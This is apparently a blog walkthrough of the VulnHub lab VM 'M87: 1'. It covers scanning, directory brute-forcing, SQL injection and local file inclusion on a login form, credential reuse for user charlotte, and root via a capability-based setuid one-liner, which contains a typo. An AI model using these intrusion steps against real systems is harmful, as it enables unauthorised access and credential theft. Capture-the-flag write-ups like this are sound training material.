Hey folks! today we have a boot2root challenge ‘M87: 1’ it’s a vulnhub VM created by ‘mindsflee’. It’s a easy box and here is the link where you can download this VM link:-https://www.vulnhub.com/entry/m87-1,595/
1.) Target Discovery
‘# netdiscover -i wlan0’
with netdiscover tool we get the ip address of our vm which is ‘192.168.1.4’
2.) Port Scanning and Service Detection
‘# nmap -sTV -p- 192.168.1.4’
With the use of ‘nmap’ we get two open ports 80,9090 and both are http and the port 22 is filtered.
3.) HTTP Enumeration
On port 80 and 9090 both had a different login pages it seems that multiple web sites are running on this server
For directory brute-forcing I fired up gobuster and in the result I found an admin directory.
Well in the admin directory their is another login page ,so for more enumeration I again used gobuster to get the directories in side the admin directory.
And gobuster shows that their is a backup directory in side the admin
And here we have another login form but this looks little interesting so I did some fuzzing and enumeration and I found that this login form take some other parameters also like ‘?id=’ and ‘?file=’
with the use of id parameter we can inject sql commands ,so basically it is vulnerable to sql injection.
As we’ve found another parameter “file” during enumeration and fuzzing which leads to LFI. through this vulnerability I found that their is only one user on the box “ charlotte”.
Now we had two vulnerabilities and it’s time to exploit them so first I used ‘sqlmap’ to fetch data from the database.
With the help of sqlmap we got a bunch of credentials with their username, so I tried to login on port 9090 web login page with all these credential, but I was unable to login
If you remember that their is only one user on this box “charlotte” which we found during LFI test, so I used “charlotte” as username and the admin’s password as password(which we found in SQLI).
“charlotte : 15TheDm1n4L1f3”
And we successfully login the web site and we got a terminal access from the web.
4.) Privilege Escalation
The image might not be clear to you but here I run these following command to find a capability.
“$ getcap / -r 2>/dev/null”
Then I found a capability ‘/usr/bin/old’. To exploit it I fired the command below
“/usr/bin/old -c ‘impoty os:os.setuid(0); os.system(“/bin/bash”)’ ”
And after successfully exploiting the capability I got the root privilege and ‘proof.txt’ flag
Rooted !!! :)